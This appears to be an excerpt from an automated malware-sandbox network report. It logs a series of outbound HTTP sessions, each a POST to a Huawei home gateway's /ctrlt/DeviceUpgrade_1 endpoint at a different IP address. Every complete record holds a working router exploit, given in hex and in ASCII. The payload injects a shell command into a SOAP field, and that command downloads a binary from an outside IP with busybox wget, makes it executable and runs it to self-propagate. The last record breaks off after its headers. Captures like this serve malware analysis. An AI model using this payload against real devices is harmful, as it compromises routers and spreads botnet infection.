                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1455192.168.2.1340460197.220.188.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.484951973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1456192.168.2.1335962157.175.175.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485009909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1457192.168.2.134755280.147.191.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485043049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1458192.168.2.1340348189.105.153.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485124111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1459192.168.2.134788857.77.133.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485140085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1460192.168.2.1340528183.24.1.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485156059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1461192.168.2.1355694197.141.23.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485214949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1462192.168.2.1348614157.12.202.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485229015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1463192.168.2.1347556123.177.76.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485239983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1464192.168.2.135642841.134.175.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485255957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
